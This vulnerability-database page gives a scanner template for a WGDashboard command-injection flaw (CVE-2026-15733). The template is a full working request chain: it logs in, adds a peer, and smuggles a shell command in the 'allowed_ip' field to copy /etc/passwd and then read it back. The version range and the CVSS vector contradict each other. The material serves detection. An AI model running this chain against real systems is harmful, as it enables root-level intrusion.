WGDashboard <= 4.3.2 - Authenticated OS Command Injection /etc/passwd Read
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2026-15733 | 7 Aug 202619:06 | – | circl | |
| CVE-2026-15733 | 6 Aug 202620:00 | – | cve | |
| CVE-2026-15733 WGDashboard Remote Code Execution vulnerability | 6 Aug 202620:00 | – | cvelist | |
| EUVD-2026-54247 | 7 Aug 202600:31 | – | euvd | |
| CVE-2026-15733 | 6 Aug 202622:16 | – | nvd | |
| CVE-2026-15733 WGDashboard Remote Code Execution vulnerability | 6 Aug 202620:00 | – | vulnrichment |
id: CVE-2026-15733
info:
name: WGDashboard <= 4.3.2 - Authenticated OS Command Injection /etc/passwd Read
author: str4k3r,0x_Akoko
severity: critical
description: |
WGDashboard <= 4.2.3 contains a command injection caused by multiple OS command injection points, letting authenticated attackers execute arbitrary commands as root.
impact: |
Authenticated attackers can execute arbitrary commands as root, leading to full system compromise.
remediation: |
Update to the latest version beyond 4.2.3.
reference:
- https://github.com/Stuub/WGDashboard-v4.3.2-OS-Command-Injection-to-Root-RCE-PoC
- https://github.com/WGDashboard/WGDashboard
- https://nvd.nist.gov/vuln/detail/CVE-2026-15733
classification:
cve-id: CVE-2026-15733
epss-score: 0.13545
epss-percentile: 0.96128
cwe-id: CWE-78
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
verified: true
max-request: 5
product: wgdashboard
vendor: wgdashboard
tags: cve,cve2026,wgdashboard,rce,cmdi,authenticated,intrusive
variables:
username: ""
password: ""
probe: "{{to_lower(rand_text_alpha(8))}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
POST /api/authenticate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"status\":true")'
condition: and
internal: true
- raw:
- |
GET /api/getWireguardConfigurations HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'len(config_name) > 0'
condition: and
internal: true
extractors:
- type: regex
name: config_name
part: body
group: 1
internal: true
regex:
- '"Name":"([^"]+)"'
- raw:
- |
POST /api/addPeers/{{config_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name":"probe-{{probe}}","allowed_ips":[],"preshared_key_bulkAdd":false}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'len(peer_id) > 0'
condition: and
internal: true
extractors:
- type: regex
name: peer_id
part: body
group: 1
internal: true
regex:
- '"id":"([^"]+)"'
- raw:
- |
POST /api/updatePeerSettings/{{config_name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":"{{peer_id}}","name":"probe-{{probe}}","private_key":"","DNS":"1.1.1.1","allowed_ip":"10.253.253.253/32;cp${IFS}/etc/passwd${IFS}static/app/dist/{{probe}}.txt;","endpoint_allowed_ip":"0.0.0.0/0","preshared_key":"","mtu":1420,"keepalive":21,"notes":""}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true
- raw:
- |
GET /static/app/dist/{{probe}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "root:") && contains(body, ":/bin/")'
condition: and
# digest: 490a0046304402207ab993288083b0b94b68180012b5c2d505bacc82b614d4a1474e674146a71dbe02202db7b9a93c3dead14c17ebac9f384985a4948c50001a60f5f5ecf10e658aafc1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2026 21:41Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.19.8
EPSS0.13545
SSVC